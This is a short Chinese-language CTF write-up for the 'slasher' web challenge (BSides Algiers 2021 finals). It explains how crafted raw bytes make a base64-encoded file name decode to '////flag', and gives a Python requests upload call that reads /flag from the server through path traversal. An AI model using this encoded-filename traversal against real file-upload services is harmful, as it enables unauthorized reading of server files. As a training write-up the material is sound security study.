slasher (Bsides-Algiers-2k21-Finals-chals)

Lysithea 2023-10-26 22:50:35 767 0


打开之后首先是注册登录,然后可以进行文件上传。上传文件后,页面上出现文件名,并且可以通过?filename=参数下载回来,注意文件名被进行了base64编码。


提示flag文件位于/flag处,因此构造文件名(ff ff ff 7e 56 a0)使得base64编码后为////flag,这样再下载时,会直接根据绝对路径传回flag文件。网页上不太好直接操作,我这里用的python requests库。上传完成后下载对应文件可得flag。


requests.post('http://82.157.146.43:17972/upload', files={'file':open('test','rb')}, data={'filename': '\xff\xff\xff\x7e\x56\xa0'}, cookies={'session': 'eyJ1aWQiOjF9.ZTp6Nw.kWQIM2nc13hHOf4naTWzopZQRVc'})

分类:WEB
image
作者:Lysithea

5

提交

0

收入

相关WriteUP

  • sqli-0x1 Writeup

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • [HackINI-2022] lfi WriteUp

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • just-work-type

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • Fetus Web

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 7月前
  • post-the-get

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
问题反馈